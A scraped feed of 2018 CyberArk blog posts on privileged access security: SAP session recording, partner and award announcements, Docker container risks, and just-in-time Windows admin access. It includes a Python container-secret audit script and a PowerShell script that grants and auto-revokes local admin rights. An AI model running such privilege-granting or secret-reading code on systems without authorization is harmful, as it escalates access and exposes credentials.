Session information storage time can be configured to your organization’s specific needs. You can keep them for one year, five years or longer as required. You can also specify where these recordings are stored. For example, you can store the SAP recordings within CyberArk and the operating system recordings elsewhere if you choose.

Remember that the average lag time from a breach to discovery is 99 days. If you’re deleting your recordings after just three weeks, you’re going to lose a lot of material that could be helpful during a forensics process. A best practice for SAP-related recordings is to store them for about 18 months.

Q: Can you explain how override accounts work in SAP environments?

A reconcile user inside the CyberArk solution is a privileged account on the target SAP system that can be used to override the password of other privileged accounts. As an example, imagine the password of DDIC is no longer synchronized. In other words, something went wrong, or perhaps somebody manually modified the password during a session. You can use a reconcile account to override that password. Of course, adequate privileges are required to perform such an override action. The recommendation here would be to use a very powerful, highly privileged user.

Editor’s Note: These responses have been edited for clarity and brevity. Have additional questions about protecting your ERP applications and systems? Check out the following resources or get in touch with us.

]]>
Discover the Power of We: SailPoint + Okta + CyberArk https://www.cyberark.com/blog/discover-the-power-of-we-sailpoint-okta-cyberark/ Fri, 28 Dec 2018 14:41:07 +0000 https://www.cyberark.com/?p=31723

Organizations have more challenging and pressing technology concerns than ever before. Maintaining a modern computing environment means more applications, more users and more data living in more places. This, of course, also means more risk. Protecting high-value assets against increasingly damaging cyber attacks – while effectively balancing efficiency and user productivity – requires both innovation and collaboration. We’ve continued to expand the CyberArk C3 Alliance, extending the power of privileged access security to help organizations better protect against advanced threats through a deeper set of innovative cyber security solutions.

As part of this ongoing initiative, we joined forces and hit the road with C3 Alliance partners SailPoint and Okta this fall, traveling across North America together to share our unified identity solution that addresses every aspect of an organization’s identity needs including access management, identity governance and privileged access.

Throughout this roadshow series, organizations from Seattle to Tampa learned how to securely manage and govern all users – including both privileged and non-privileged application and data access – across the employee/partner lifecycle, from onboarding through off-boarding. With these best-of-breed solutions integrated, enterprises can ensure essential identity functions are secure and automated, authorization policies are enforced, and user access activity is documented and compliant. The result is that enterprises can maintain a high level of user productivity, compliance and security.

Together with SailPoint and Okta, we’ve compiled key takeaways from these roadshows and created several resources to help organizations learn how to securely and effectively authenticate, provision and govern access to all applications and data across a hybrid cloud and on-premises enterprise:

VIDEO: Okta, SailPoint, CyberArk: The Powers of Identity and Privilege

In two minutes, learn why some of the world’s leading organizations turn to an integrated solution to mitigate the risk of a security breach, ensure compliance and automatically enable today’s modern workforce. You can also check out our short videos showcasing the CyberArk Privileged Access Security integration with Okta SSO and MFA and integration with SailPoint Identity Governance.

eBook: The Powers of Identity Governance and Privileged Access Security

Explore how the integration between SailPoint Identity Governance and CyberArk Privileged Access Security allows organizations to close security gaps, reduce risk and eliminate redundant processes related to managing non-privileged and privileged access.

Buyer’s Checklist: Evaluating Your Control Over Identity and Privileged Access

Where do you stand in managing your non-privileged and privileged users/applications? This checklist is designed to help you identify where to focus your efforts to more effectively and efficiently close security gaps, reduce risk and manage identity and access management.

To learn more about the “Identity Trifecta” of integrated SailPoint, Okta and CyberArk solutions, visit the CyberArk Marketplace.

]]>
Securing Containers: Understanding and Mitigating Vulnerabilities https://www.cyberark.com/blog/securing-containers-understanding-and-mitigating-vulnerabilities/ Fri, 21 Dec 2018 20:25:37 +0000 https://www.cyberark.com/?p=31749

Adoption of containers as a means to package and run applications continues to surge. There are many benefits driving this trend, first and foremost for developers, but also extending across the entire application lifecycle.

While container adoption continues to soar, organizations face a number of critical challenges in protecting the secrets and credentials necessary for a containerized workflow.

In a recent On the Front Lines Webinar, we explored several container-specific security vulnerabilities and the techniques to address them, which are applicable to Docker, Kubernetes and popular platforms such as OpenShift and Cloud Foundry.

To set the stage, we examined a typical Docker workflow. This includes the initial client request to the host (which comprises the Docker daemon, containers and images) and the registries that house all of the images. The Docker daemon is a service that runs on the host OS and manages both the containers and images. It listens for API requests from the Docker client and also acts as the communication layer to manage other services within Docker. (You can read more about this here).

There are six specific points throughout this Docker ecosystem that could be breached at any given point in time and lead to either malicious or unintended consequences. Following is a look at each of these steps, along with best practices to mitigate risk.

  1. Unsecured access to the Docker API. Users added to the “docker” group can use all Docker functions that utilize images and containers. To mitigate risk, do not add all accounts to the “docker” group and enforce least privilege policies to limit commands that can be sent by a user.
  2. Passing secrets from host to container using environment variables at run time. Secrets can be passed through to the Docker container at run time using the “-e” flag. These secrets have to be passed through in clear text, and any automation scripts will have to define these variables. As a result, any user with access to the Docker API will be able to grab the secret information (for example, by inspecting the container). It’s essential to limit commands available to the user and secure host access by monitoring privileged user sessions.
  3. Running containers with the privileged flag. Running containers with the “--privileged” flag provides the container with direct access to host elements such as devices and other pieces of hardware. To minimize the risk of data breaches and outages associated with uncontrolled access, it’s important to enforce least privilege policies across your Docker hosts.
  4. Running containers as root. By not declaring a user for each container or using the “--user” flag, processes in the container run with the same UID and GID as root on the host machine – even if the passwords are different. This can lead to the container(s) gaining access to files on the host machine if they are mapped within the container. It’s important to always map to a known user at the end of your Dockerfile and also restrict access to Docker run time commands.
  5. Insecure image registries. All containers come from one or more registries. With unsecured access to registries, an attacker can manipulate your images to add code – without your approval or knowledge. To prevent this from happening, you should always secure your registries with SSL/TLS, create distinct users, store user(s) and certificate information in a secure vault and regularly rotate credentials.
  6. Unsecured access to the Docker host(s). All of your efforts to protect your Docker APIs, image registries, etc. will be for naught if an attacker can access your host machine(s). Therefore, all SSH and web page connections to your Docker/orchestration host machine should be monitored and recorded, and all root accounts should be managed, stored and regularly rotated in a secure vault.
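Points 2 to 4 above can be checked mechanically from `docker inspect` output and from a Dockerfile. The following Python audit is an added example, not code from the webinar or from CyberArk; the container records and Dockerfile text it reads are constructed samples in the shape of `docker inspect` JSON, not captured from a real host.

```python
"""Audit docker-inspect style records and a Dockerfile for the risks above:
secrets in environment variables, --privileged, and running as root.

Added example. SAMPLE_INSPECT and SAMPLE_DOCKERFILE are constructed, not real.
"""
import json
import re

# Environment variable names that suggest a credential was passed with "docker run -e".
SECRET_NAME = re.compile(r"PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)

# Constructed sample with the fields `docker inspect` emits for two containers.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/billing-worker",
        "Config": {"User": "", "Env": ["DB_PASSWORD=hunter2", "PATH=/usr/bin"]},
        "HostConfig": {"Privileged": True},
        "Mounts": [{"Type": "bind", "Source": "/etc", "Destination": "/host-etc", "RW": True}],
    },
    {
        "Name": "/web-frontend",
        "Config": {"User": "app:app", "Env": ["PATH=/usr/bin", "LOG_LEVEL=info"]},
        "HostConfig": {"Privileged": False},
        "Mounts": [],
    },
])

# Constructed Dockerfile with no USER instruction (the point 4 mistake).
SAMPLE_DOCKERFILE = """\
FROM debian:12-slim
RUN apt-get update && apt-get install -y --no-install-recommends python3
COPY app.py /srv/app.py
ENTRYPOINT ["python3", "/srv/app.py"]
"""


def runs_as_root(user):
    """True if Config.User is empty or names uid 0; the container then runs as root."""
    name = user.split(":", 1)[0]
    return name in ("", "0", "root")


def audit_container(record):
    """Return findings for one container record (points 2, 3 and 4 above)."""
    findings = []
    name = record.get("Name", "?").lstrip("/")
    cfg = record.get("Config", {})
    host = record.get("HostConfig", {})
    if host.get("Privileged"):
        findings.append(f"{name}: started with --privileged (direct host device access)")
    root = runs_as_root(cfg.get("User", ""))
    if root:
        findings.append(f"{name}: runs as root (no USER in image and no --user flag)")
    for entry in cfg.get("Env", []):
        key, _, value = entry.partition("=")
        if value and SECRET_NAME.search(key):
            findings.append(f"{name}: secret in environment variable {key} (readable via docker inspect)")
    # A root container with a writable bind mount is exactly the host file access point 4 warns about.
    for mount in record.get("Mounts", []):
        if root and mount.get("Type") == "bind" and mount.get("RW", True):
            findings.append(f"{name}: root container has writable bind mount of host path {mount.get('Source')}")
    return findings


def audit_inspect_output(inspect_json):
    """Map container name to its findings for a whole `docker inspect` JSON array."""
    return {r["Name"].lstrip("/"): audit_container(r) for r in json.loads(inspect_json)}


def audit_dockerfile(text):
    """Check that the last USER instruction selects a non-root user (point 4).

    Assumption: a single-stage Dockerfile, so the last USER line is the one that applies.
    """
    last_user = None
    for line in text.splitlines():
        m = re.match(r"\s*USER\s+(\S+)", line, re.I)
        if m:
            last_user = m.group(1)
    if last_user is None:
        return ["Dockerfile: no USER instruction, image runs as root by default"]
    if runs_as_root(last_user):
        return [f"Dockerfile: final USER is {last_user}, image still runs as root"]
    return []


if __name__ == "__main__":
    for container, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(container, "->", findings or "ok")
    print(audit_dockerfile(SAMPLE_DOCKERFILE) or "Dockerfile ok")
```

In practice the JSON comes from `docker inspect $(docker ps -q)` run on the host, and the Dockerfile check belongs in CI before the image is pushed to the registry.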

While there’s no question that containers are here to stay, they have introduced a host of new security challenges that must be addressed. Now is the time to assess your container environment and begin protecting privileged access.

For tips on getting started, tune in to the full webinar, check out CyberArk Conjur and its comprehensive integrations with leading container platforms or contact your CyberArk team for a full evaluation.

]]>
CyberArk Adds the Privileged Access Security Solution v10.4 to the DoDIN APL https://www.cyberark.com/blog/cyberark-adds-the-privileged-access-security-solution-v10-4-to-the-dodin-apl/ Mon, 17 Dec 2018 17:58:05 +0000 https://www.cyberark.com/?p=31647

It’s been nearly a decade since the Department of Defense (DoD) created the Department of Defense Information Network Approved Products List (DoDIN APL) to highlight tried and tested solutions that specifically address government security concerns. The APL was developed in an effort to maintain a single consolidated list of products that meet the demands of the nation and our growing need to protect and secure sensitive data and networks. Completing the certification process is an indication to agencies and government end users that all listed products have undergone rigorous DoD testing regulations, passing stringent information assurance (IA), interoperability (IO), Common Access Card (CAC)/Public Key Infrastructure (PKI), and IPv6 requirements.

U.S. government procurement for products that are on the DoD network is limited to only those solutions that have completed this strenuous testing process. The DoDIN APL now serves as the agency’s master list of readily available solutions that are approved to operate within the defense technology infrastructure.

We are happy to announce that the CyberArk Privileged Access Security Solution v10.4 has completed testing and was certified effective October 4, 2018 as a Cybersecurity Tools (CST) device type (Tracking Number (TN) 1712401).

We previously received both APL and Common Criteria (CC) designations for v9.1 of the CyberArk solution in early 2016 and are currently certifying v10.4 for CC under a National Information Assurance Partnership (NIAP) protection profile.

CyberArk’s Commitment to the Federal Government Agencies

The CyberArk Privileged Access Security Solution has been independently validated and awarded an Evaluation Assurance Level (EAL) 2+ under the Common Criteria Recognition Agreement (CCRA). We’ve received the U.S. Army Certificate of Networthiness (CoN) enabling the streamlined implementation of the CyberArk solution on the Army Enterprise Architecture/LandWarNet (LWN). You can visit the Army CoN website for more details on the CyberArk certification #201621511 (requires CAC for access). Prioritizing both obtaining and maintaining these certifications demonstrates CyberArk’s continued commitment to helping federal government agencies proactively protect privileged users and credentials across networks.

Here are a few ways in which CyberArk can help meet security and compliance requirements in federal government agencies:

  • FISMA/NIST SP800-53 – CyberArk solutions help federal government agencies comply with requirements related to the “Access Control,” “Audit and Accountability” and “Identification and Authentication” control families.
  • Department of Homeland Security CDM Program – Phase 2 of the Continuous Diagnostics and Mitigation (CDM) program features least privilege and infrastructure integrity requirements which can be addressed with CyberArk solutions.
  • NERC – CIP – Requirements related to privileged access control, remote access management and access revocation in the regulation can be addressed with CyberArk solutions.
  • HSPD-12 – The requirement to authenticate using a Personal Identity Verification (PIV) card can be easily implemented across all current and legacy systems with the seamless integration of CyberArk solutions and PIV cards.

You want Federal White Papers? We’ve got Federal White Papers:

To learn more, visit https://www.cyberark.com/solutions/federal-government-solutions/.

]]>
Ready Player One: A Synopsis on Terrible Password Management in a Dystopian Future https://www.cyberark.com/blog/ready-player-one-a-synopsis-on-terrible-password-management-in-a-dystopian-future/ Fri, 07 Dec 2018 20:40:25 +0000 https://www.cyberark.com/?p=31152

Last week I was on a plane alongside my fellow brethren of cloud poindexters and developer geeks (with the occasional C-level exec mixed in) to attend the annual AWS re:Invent conference. After browsing the in-flight entertainment, I came across the trailer for “Ready Player One” and couldn’t resist a Steven Spielberg science fiction movie chock-full of ‘80s pop culture references.

A Quick Movie Recap (Spoiler Alert)

The setting of the film is in a dystopian future where fossil fuels have been exhausted, the world has become overpopulated, every country has gone to war and the effects of global warming have finally taken their toll on the planet (totally unrealistic right?!). As a means to escape this grim existence, a group of developers created a virtual reality known as ‘the OASIS,’ allowing users to create an avatar and interact in this new world via ‘kinesthetic communication.’ The OASIS provides a virtual refuge and the ultimate freedom of choice for users to “be” and “do” whatever they desire.

Fast forward and one of the founding developers passes away, but just prior to doing so he creates a three-part challenge whereby the winner inherits not only an absurd amount of money, but more importantly, complete and total control over the world’s most important economic resource – the OASIS.

The hero of the story, Wade Watts (avatar name: Parzival) devotes all of his time trying to complete the challenge as his only hope to escape the clutches of poverty. Wade isn’t the only one trying to get the keys to the OASIS. Innovative Online Industries (IOI) and its CEO, Nolan Sorrento, stop at nothing to win the challenge.

Parzival successfully completes the first challenge and is almost immediately summoned and propositioned by Sorrento to work for IOI to win the remaining two. Sorrento makes a crucial privileged access security mistake by showcasing his fancy gaming rig and inadvertently revealing his password (hidden in plain sight, written on a post-it note) used to log into the OASIS.

Greasing the tracks again on the storyline, the second challenge is completed and shortly after that, the sidekick and love interest of our hero, Samantha Cook (avatar name: Artemis) is apprehended, held captive and forced to work for IOI. In an effort to save Artemis, Parzival and his clan ingeniously execute a man-in-the-middle (MITM) attack by remotely intercepting Sorrento’s attempts to access the OASIS with the credentials they’ve obtained from his rig. They successfully tap into Nolan’s feed, get the location and specifications of Artemis’ cell and instruct her how to escape.

Quoting directly from the movie:

“How much of Sorrento’s rig do you remember?”…“Pretty much everything”

“A fixed rig is easy to locate and hard to hack”…“unless he’s (Nolan Sorrento) stupid enough to leave his password lying around”

Once freed, Artemis casually walks over to Sorrento’s rig and with the same stolen credential, becomes the ultimate insider threat by impersonating him as a privileged user and steals confidential information that ultimately helps win the final challenge, granting total control over the OASIS to Parzival and his clan. Important note: Multi-factor Authentication (MFA), retinal scanning or any futuristic equivalent of validating and authenticating users had also not been implemented, proving IOI to have arguably the worst futuristic security posture of all time.

Don’t Leave Your Passwords Lying Around

The heroes in this story would not have been successful if foundational credential security and management had been in place. It goes without saying that leaving privileged passwords lying around in plain text is a terrible security practice, and when credentials are left to be managed manually, it can become extremely costly. Even in the year 2018, some IT teams are still tasked with manually rotating and updating privileged credentials to comply with internal policy or industry regulatory compliance. These processes are extremely time-consuming and prone to human error. Without tools in place to automate and synchronize credential changes across systems, organizations can face high operational costs as well as lost productivity caused by accidental account lockouts.

The CyberArk Privileged Access Security Solution automatically stores and rotates credentials based on whatever policy you set. The solution can perform automatic credential invalidation to prevent malicious users from escalating privileges and performing reconnaissance inside the environment. Taking it one step further, the solution provides both anomalous and high-risk detection and alerting capabilities. These capabilities would have certainly helped Sorrento protect his rig and mitigate the risk of both initial compromise and privileged data exfiltration. The alerts produced by CyberArk contain detailed, user-level intelligence including the number of compromised machines, the date and time of the malicious activity, and the IP address used, which would have enabled IOI’s security team to respond quickly to the numerous attacks from Parzival and his clan.

CyberArk is not in the business of protecting villains or evil enterprises, but we are committed to protecting the keys to the IT kingdom. Again, quoting the movie directly:

“The keys are invisible, hidden in a dark room at the center of a maze.”

At the climax of the story, the IOI team was so close to completing the third and final challenge. They successfully won ‘Adventure’ on the Atari 2600 but failed to understand that in order to win the competition, they needed to locate the key hidden in the heart of a sealed chamber, which provided access to a highly sought-after ‘privileged secret’ within the game – the keys to the kingdom.

Protect your keys – whether SSH keys, AWS key pairs, passwords, secrets or any other privileged credential. Take the first step and discover your “keys” with a CyberArk DNA scan or request a live demo to see how CyberArk can keep you safe from the cyber attacks of today and tomorrow.

CyberArk Named a Leader in Gartner’s Inaugural 2018 Magic Quadrant for Privileged Access Management https://www.cyberark.com/blog/cyberark-named-a-leader-in-gartners-inaugural-2018-magic-quadrant-for-privileged-access-management/ Wed, 05 Dec 2018 16:09:42 +0000 https://www.cyberark.com/?p=31083

Today marks a major milestone with the release of the first-ever Gartner 2018 Magic Quadrant for Privileged Access Management.* CyberArk was named a Leader, positioned highest for ability to execute and furthest for completeness of vision.

As the market pioneer, not only is this a major accomplishment for us as an organization, but it’s also an important milestone for the market at large. According to the report, “Privileged access management is one of the most critical security controls, particularly in today’s increasingly complex IT environment. Security and risk management leaders must use PAM tools in a long-term strategy for comprehensive risk mitigation.”

As the company recognized for establishing the market category, we are extremely proud to be named a Leader. We remain laser-focused on helping organizations to secure the enterprise by delivering innovative solutions that break the attack chain and protect their most valuable assets. We will continue our work to make a quantifiable impact on the security of companies and governmental organizations around the world, enabling them to adopt digital transformation strategies with confidence.

As we celebrate being named a Leader in the Gartner Magic Quadrant for Privileged Access Management, we’d like to thank all of our incredible customers, partners and employees who have been, and will continue to be, the cornerstone of our success.

Read the Full Report

Download the full 2018 Magic Quadrant for Privileged Access Management report here. To learn more about the CyberArk Privileged Access Security Solution or to see what customers and other industry experts say about us, visit our website.

*Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018
Note: Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.
AWS Security Hub Extends Privileged Access Threat Analytics Capabilities with CyberArk https://www.cyberark.com/blog/aws-security-hub-extends-privileged-access-threat-analytics-capabilities-with-cyberark/ Thu, 29 Nov 2018 20:11:20 +0000 https://www.cyberark.com/?p=30782

Today’s most disruptive cyber attacks center on controlling an organization’s high-value assets with privileged access. Numerous headlines on cloud-related breaches tied to misconfigured Amazon S3 buckets, stolen access keys and more have made it clear that privileged accounts, credentials and secrets deliver an unobstructed pathway to critical infrastructure and applications in the cloud.

CyberArk, an AWS Partner Network (APN) Advanced Technology Partner, provides industry-leading privileged access security support for the AWS community and ecosystems. With a commitment to innovation and a focus on mitigating the risks of emerging cyber threats, CyberArk empowers cloud-first organizations to fortify their security and gain a competitive edge by putting privilege at the center of their digital transformation initiatives.

Further extending this commitment, CyberArk today introduced integration with the newly unveiled AWS Security Hub and CyberArk Privileged Threat Analytics, part of the CyberArk Core Privileged Access Security Solution. This integration enables organizations to collect, detect, view, alert and respond to high-risk privileged access activity across their entire AWS environment.

Detect and Prevent Privileged Access Attacks

AWS Security Hub is designed to provide users with a comprehensive view of their high-priority security alerts and compliance status by aggregating, organizing and prioritizing alerts, or findings, from multiple AWS services such as Amazon GuardDuty, Amazon Inspector and Amazon Macie, as well as from APN security solutions. The findings are then visually summarized on integrated dashboards with actionable graphs and tables.

The CyberArk integration brings the benefits of Privileged Threat Analytics to the Security Hub, providing organizations with deeper, data-driven insights and enhanced detection capabilities, enabling them to break the attack lifecycle quickly.

With CyberArk, AWS Security Hub customers gain:

  • Unprecedented Privileged Access Analysis. By integrating seamlessly with leading SIEM solutions, CyberArk collects, analyzes and delivers enterprise-wide, real-time insights on privileged access activity to help organizations mitigate security risks linked to unauthorized access, impersonation, fraud and theft.
  • Best-of-Breed Threat Detection. The CyberArk Privileged Threat Analytics engine leverages statistical modeling, machine learning, behavioral analytics and deterministic algorithms to rapidly detect malicious activity. For example, an insider who has gained access to privileged credentials or secrets can initiate seemingly legitimate privileged user sessions. CyberArk’s automated, real-time detection and alerting capabilities can quickly identify these stealthy insider attacks.
  • Critical Context. CyberArk analyzes, classifies and ranks each threat finding, while providing recommended actions for remediation. This allows organizations to zero in on specific findings such as lateral movement activity. CyberArk then feeds this valuable information to the AWS Security Hub, which ingests the data using a standard findings format, then correlates information across AWS services and AWS partner tools to help organizations visualize and prioritize the most important findings (see Figure 1 below).


Figure 1. The AWS Security Hub console displaying alerts and detections forwarded by CyberArk Privileged Threat Analytics

Joint AWS and CyberArk customers can take advantage of this integration now through a subscription model. To learn more, please visit the CyberArk Marketplace.

CyberArk provides broad and deep privileged access security for organizations using AWS. In addition to this new integration with AWS Security Hub, CyberArk’s use of Amazon Machine Images (AMI) and AWS CloudFormation simplifies the discovery and prioritization of privileged account risk in the cloud. Additional integrations with AWS, including automating the onboarding of credentials through integrations with Amazon CloudWatch and AWS Lambda, enable security teams to dramatically reduce the risk of unsecured credentials. To learn more about CyberArk support for the AWS community, visit https://www.cyberark.com/aws/.

CyberArk Achieved Advanced Tier Partner Status with Amazon Web Services https://www.cyberark.com/blog/cyberark-achieved-advanced-tier-partner-status-with-amazon-web-services/ Wed, 28 Nov 2018 22:01:55 +0000 https://www.cyberark.com/?p=30762

CyberArk is very excited to announce our achievement of Advanced Technology Partner status with Amazon Web Services (AWS). For background, the Amazon Partner Network (APN) is a global partner program for AWS, focused on helping APN Partners build successful AWS-based businesses or solutions by providing business, technical, marketing and go-to-market support. This achievement in our partnership with AWS reaffirms that we’ve built a strong AWS-based business, and it showcases proof of expertise. More importantly, it also provides CyberArk with additional tools and resources from Amazon enabling us to both invest in and differentiate our solution for our AWS customers with new features, new functionality and improved cloud security services. This also benefits our customers and partners.

CyberArk is the trusted leader in privileged access security, helping the world’s leading organizations to protect against external attackers and malicious insiders both in the cloud, on-premises and everywhere in between. Organizations use CyberArk solutions to protect the cloud workloads they deploy and run on AWS, securing their privileged accounts and credentials at each stage of their cloud journey. CyberArk offers several powerful integrations with AWS to bolster and increase the security of an organization’s cloud assets, including AWS Security Token Service (STS), Amazon Inspector, Amazon CloudWatch, AWS Lambda, and most recently AWS Security Hub.

CyberArk’s partnership with Amazon is longstanding. Beyond building new integrations throughout the past year, we’ve placed a big focus on simplifying the way our customers experience CyberArk at all different stages in AWS. First, we expanded our automation capabilities with the addition of CyberArk AMIs (Amazon Machine Images) and AWS CloudFormation templates, which automate the deployment of our solution in as little as 15 minutes. More recently, we listed the CyberArk Privileged Access Security Solution and Conjur Open Source products in the AWS Marketplace for easier consumption of CyberArk solutions by AWS customers. As we move into 2019, we plan to add additional products and solutions to the AWS Marketplace as well as integrate with even more AWS services. This gives our customers more options to meet high security standards for protecting cloud administrator and management consoles, compute environments, DevOps tools and more.

Connect With CyberArk at AWS re:Invent

We are live at AWS re:Invent. Be sure to visit the CyberArk booth #2823 in the Sands Expo and Convention Center (next to the Venetian) to discuss how CyberArk can secure your AWS workloads. Ask for a live demonstration of the solution.

CyberArk Version 10.6 is Here Just in Time https://www.cyberark.com/blog/cyberark-version-10-6-is-here-just-in-time/ Mon, 19 Nov 2018 18:49:44 +0000 https://www.cyberark.com/?p=30437

Organizations understand that securing privileged access is critical, which requires solutions to identify and systematically lock down accounts and systems with elevated levels of privilege. To effectively reduce risk, organizations must be able to fully manage, secure and automatically rotate credentials (especially for shared groups), while enabling employees to securely access critical target systems.

The concept of providing access to specific target systems during specific times when it is requested can be referred to as “just-in-time” access. This strategy is seen as a way to quickly install effective controls and provide privileged users the ability to access target machines without the need to manage and store credentials. These implementations are lightweight solutions that provide organizations the ability to introduce security protocols and help establish habitual security before segueing into a robust Privileged Access Security program. Version 10.6 of the CyberArk Privileged Access Security (PAS) Solution includes a feature that enables this option.

CyberArk’s Ad Hoc Access provides just-in-time access to Windows servers by placing an admin account on each desired system. When users require access to one of those particular systems, they must request access through the CyberArk console before they are allowed on to that system for a defined time period. Below is a screenshot showing what it looks like when an end user wants to “get access” to a Windows server that isn’t currently onboarded into CyberArk.

Once the time window has expired, they are removed from the admin account and, if needed, will have to request access again to get back in. This is another control that moves an organization toward secured privileged access by ensuring that privileged targets are used only by the appropriate users at the appropriate time.

Workflow of an end user within CyberArk requesting Ad Hoc Access with just-in-time access to a Windows server

The steps to onboard and create Ad Hoc Access to Windows servers with the CyberArk Privileged Access Security solution are simple. First, discover local admins on targets via Accounts Discovery. Second, onboard the local admin for each target. Access is then granted to end-users using Ad Hoc Access for a specified time period.
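The time-bound local admin membership the steps above describe, as an added PowerShell illustration of the just-in-time pattern; this is not CyberArk’s Ad Hoc Access code. It assumes Windows PowerShell 5.1 run elevated on the target server, and the event source name and the `CONTOSO\jdoe` account are placeholders.

```powershell
#Requires -RunAsAdministrator
# Added illustration of just-in-time local admin membership with automatic expiry.
# Not CyberArk code. Assumes Windows PowerShell 5.1 on the target Windows server.
$script:EventSource = 'JitLocalAdmin'   # placeholder Application-log source for the audit trail

function Initialize-JitEventSource {
    # Register the event source once so grants and revocations leave a record in the Application log.
    if (-not [System.Diagnostics.EventLog]::SourceExists($script:EventSource)) {
        New-EventLog -LogName Application -Source $script:EventSource
    }
}

function Write-JitAudit {
    param([int]$EventId, [string]$Message)
    Write-EventLog -LogName Application -Source $script:EventSource -EventId $EventId `
        -EntryType Information -Message $Message
}

function Get-JitTaskName {
    param([string]$User)
    # Scheduled task names cannot contain '\' or '/', so flatten DOMAIN\user to DOMAIN_user.
    return 'JIT-Revoke-' + ($User -replace '[\\/@]', '_')
}

function Grant-JitAdmin {
    param(
        [Parameter(Mandatory)][string]$User,            # e.g. 'CONTOSO\jdoe' (placeholder)
        [ValidateRange(5, 480)][int]$Minutes = 60        # bounded window: no open-ended grants
    )
    Initialize-JitEventSource

    # A standing member of Administrators is not a JIT user; refuse rather than silently "extend".
    $existing = Get-LocalGroupMember -Group 'Administrators' | Select-Object -ExpandProperty Name
    if ($existing -contains $User) {
        throw "$User already holds standing Administrators membership; refusing to treat it as JIT."
    }
    $expiry   = (Get-Date).AddMinutes($Minutes)
    $taskName = Get-JitTaskName $User

    # Schedule the revocation BEFORE granting: if scheduling fails, no admin rights are handed out.
    $revoke  = "Remove-LocalGroupMember -Group Administrators -Member '$User'"
    $action  = New-ScheduledTaskAction -Execute 'powershell.exe' `
                 -Argument "-NoProfile -NonInteractive -Command `"$revoke`""
    $trigger = New-ScheduledTaskTrigger -Once -At $expiry
    # EndBoundary plus DeleteExpiredTaskAfter lets Task Scheduler remove the one-shot task itself.
    $trigger.EndBoundary = $expiry.AddMinutes(5).ToString('yyyy-MM-ddTHH:mm:ss')
    $settings  = New-ScheduledTaskSettingsSet -DeleteExpiredTaskAfter (New-TimeSpan -Minutes 1)
    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
    Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger `
        -Settings $settings -Principal $principal -Force | Out-Null

    try {
        Add-LocalGroupMember -Group 'Administrators' -Member $User
    } catch {
        # Grant failed: do not leave a dangling revocation task behind.
        Unregister-ScheduledTask -TaskName $taskName -Confirm:$false -ErrorAction SilentlyContinue
        throw
    }
    Write-JitAudit -EventId 1001 -Message "JIT Administrators membership granted to $User until $expiry (task $taskName)"
    return $expiry
}

function Revoke-JitAdmin {
    param([Parameter(Mandatory)][string]$User)
    # Early revocation (work finished, or an alert fired) removes both the membership and the timer.
    Initialize-JitEventSource
    Remove-LocalGroupMember -Group 'Administrators' -Member $User -ErrorAction SilentlyContinue
    Unregister-ScheduledTask -TaskName (Get-JitTaskName $User) -Confirm:$false -ErrorAction SilentlyContinue
    Write-JitAudit -EventId 1002 -Message "JIT Administrators membership revoked early for $User"
}

# Usage (placeholder account): grant 30 minutes of local admin, then let the scheduled task remove it.
# Grant-JitAdmin -User 'CONTOSO\jdoe' -Minutes 30
# Revoke-JitAdmin -User 'CONTOSO\jdoe'   # or pull it early
```

The Application-log events (IDs 1001 and 1002 here) give an auditor the who-and-until-when record that the text notes is otherwise missing for unmanaged targets, though they do not replace session isolation or recording.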

While just-in-time solutions certainly have benefits, it is worth mentioning that by design these solutions provide minimal visibility into what users are actually doing on these unmanaged targets, since session activity on these systems is neither isolated nor recorded. However, this is a more secure solution than completely unmanaged local admin accounts.

This feature addition to the CyberArk Privileged Access Security Solution is meant to be a complement to privileged access security programs and projects. Ad Hoc Access should be seen as a method to encourage teams to install privileged controls, even if they are unable to fully manage local administrator accounts and credentials with session isolation and monitoring.

As another alternative, CyberArk also offers customers the ability to utilize Privileged Session Manager Ad Hoc Connection functionality, which provides pre/post scripts to add or remove users from unmanaged targets to connect via Privileged Session Manager. This feature provides similar ease of use to Ad Hoc Access with the added security benefit of session isolation and monitoring. However, Privileged Session Manager Ad Hoc Connection is typically leveraged when an administrator already has an account on the target machine, and knows the destination information and credentials. Within the CyberArk console, an end user is prompted to enter the platform, client, address, username and password of the target system and is then connected via Privileged Session Manager. These unmanaged targets can be accessed on an ad hoc basis to connect privileged users to any unmanaged target system (not just Windows servers) through Privileged Session Manager.

CyberArk always urges customers to be as secure as possible, but we understand that every organization is different. Providing customers with the ability to set up ad hoc policies to reduce friction for end users is an option for certain types of targets, and can be seen as another way to implement privileged access controls. The Privileged Session Manager Ad Hoc Connection is a way for organizations to avoid managing local administrator credentials while providing an audit trail of privileged sessions, but may still be met with resistance from end users. Ad Hoc Access with just-in-time access to Windows servers provides the ability to manage local administrator accounts without the audit trail, thus reducing the steps needed for end users. Inevitably it’s up to each organization to make the decision that best suits their operational and security needs alike. However, both Ad Hoc methods should be seen as ways to increase user adoption by reducing some of the friction, rather than as the most secure method; fully managing target systems is what achieves fully managed and secured privileged access.

For more information on the CyberArk Core Privileged Access Security solution please click here. CyberArk has also recently published the “Top 5 Reasons to Prioritize Privilege Today” showcasing why privileged access security should be top of mind for every organization.


Reason to Celebrate: CyberArk Named a Privileged Identity Management Leader https://www.cyberark.com/blog/reason-to-celebrate-cyberark-named-a-privileged-identity-management-leader/ Wed, 14 Nov 2018 15:12:35 +0000 https://www.cyberark.com/?p=30374/

Independent research firm Forrester Research today released The Forrester Wave™: Privileged Identity Management, Q4 2018.1 For the report, Forrester evaluated the 11 most significant privileged identity management vendors and identified CyberArk as a Leader.

In our opinion, privileged identity management is crucial to strengthening an organization’s security posture and improving risk management. According to the report, “The [CyberArk] solution has strong password safe, session management, and privileged threat analytics, as well as the broadest DevOps support of any vendor evaluated in the Forrester Wave.”

